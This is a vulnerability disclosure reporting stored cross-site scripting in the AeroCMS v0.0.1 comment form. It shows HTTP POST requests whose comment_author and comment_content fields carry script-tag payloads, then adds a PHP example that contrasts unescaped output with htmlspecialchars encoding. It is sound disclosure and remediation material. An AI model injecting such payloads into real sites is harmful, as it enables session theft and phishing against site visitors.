This repository has been archived by the owner on May 8, 2023. It is now read-only.
Description:
I found a Stored Cross-Site Scripting (XSS) vulnerability in your AeroCMS (v0.0.1) post comments section "Author" and "Content" fields. When I use malicious code or any XSS payload, the browser gives me the result, because a browser cannot know if the script should be trusted or not.
"comment_author" and "comment_content" parameters are vulnerable. Let's try to use any XSS payload in "comment_author" and "comment_content" parameters and your request data will be
CMS Version:
v0.0.1
Affected URL:
http://127.0.0.1/AeroCMS/post.php
Steps to Reproduce:
POST /AeroCMS/post.php?p_id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Origin: http://127.0.0.1
Cookie: PHPSESSID=qtj8dhp0jub18i2agkfm4bf5ea
Connection: close

comment_author=test&comment_email=[email protected]&comment_content=test&create_comment=

POST /AeroCMS/post.php?p_id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Origin: http://127.0.0.1
Cookie: PHPSESSID=qtj8dhp0jub18i2agkfm4bf5ea
Connection: close

comment_author=test"><script>alert(111)</script>&comment_email=[email protected]&comment_content=test"><script>alert('XSS')</script>&create_comment=
Proof of Concept:
You can see the Proof of Concept; I've attached screenshots and a video to confirm the vulnerability.
Stored.XSS.on.AeroCMS.mp4
Impact:
Attackers can make use of this to conduct attacks like phishing, stealing sessions, etc.
Let me know if any further info is required.
Thanks & Regards
Rahad Chowdhury
Cyber Security Specialist
https://www.linkedin.com/in/rahadchowdhury/
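
The behaviour reported above is remediated by encoding the stored "comment_author" and "comment_content" values at the point where they are written into HTML. The following is an added example, not AeroCMS code and not part of the original report: the function names, the markup and the sample row are assumptions, with the row constructed from the values in the second request.

```php
<?php
// Added example, not AeroCMS source. Function names and markup are hypothetical.

// Constructed sample row: the values the report's second request would store.
$row = [
    'comment_author'  => 'test"><script>alert(111)</script>',
    'comment_content' => 'test"><script>alert(\'XSS\')</script>',
];

// Vulnerable pattern: stored values are concatenated into HTML as-is,
// so the browser parses the stored <script> element as markup.
function render_comment_unsafe(array $row): string
{
    return '<h4>' . $row['comment_author'] . '</h4>'
         . '<p>' . $row['comment_content'] . '</p>';
}

// Encode at output time for the HTML context. ENT_QUOTES also covers quoted
// attribute values; ENT_SUBSTITUTE replaces invalid UTF-8 sequences instead
// of making htmlspecialchars() return an empty string.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened pattern: escape first, then add the only markup we intend (<br>).
function render_comment_safe(array $row): string
{
    return '<h4>' . e($row['comment_author']) . '</h4>'
         . '<p>' . nl2br(e($row['comment_content'])) . '</p>';
}

// Regression check: the tag survives the unsafe renderer but is inert text
// after the safe one. Throws if either expectation fails.
function check_renderers(array $row): void
{
    if (stripos(render_comment_unsafe($row), '<script') === false) {
        throw new RuntimeException('unsafe renderer no longer reproduces the issue');
    }
    if (stripos(render_comment_safe($row), '<script') !== false) {
        throw new RuntimeException('safe renderer emitted a raw <script> tag');
    }
}

check_renderers($row);
echo render_comment_safe($row), PHP_EOL;
```

Encoding on output rather than on input keeps the database holding what the user typed and protects every page that renders the row, including rows stored before the fix.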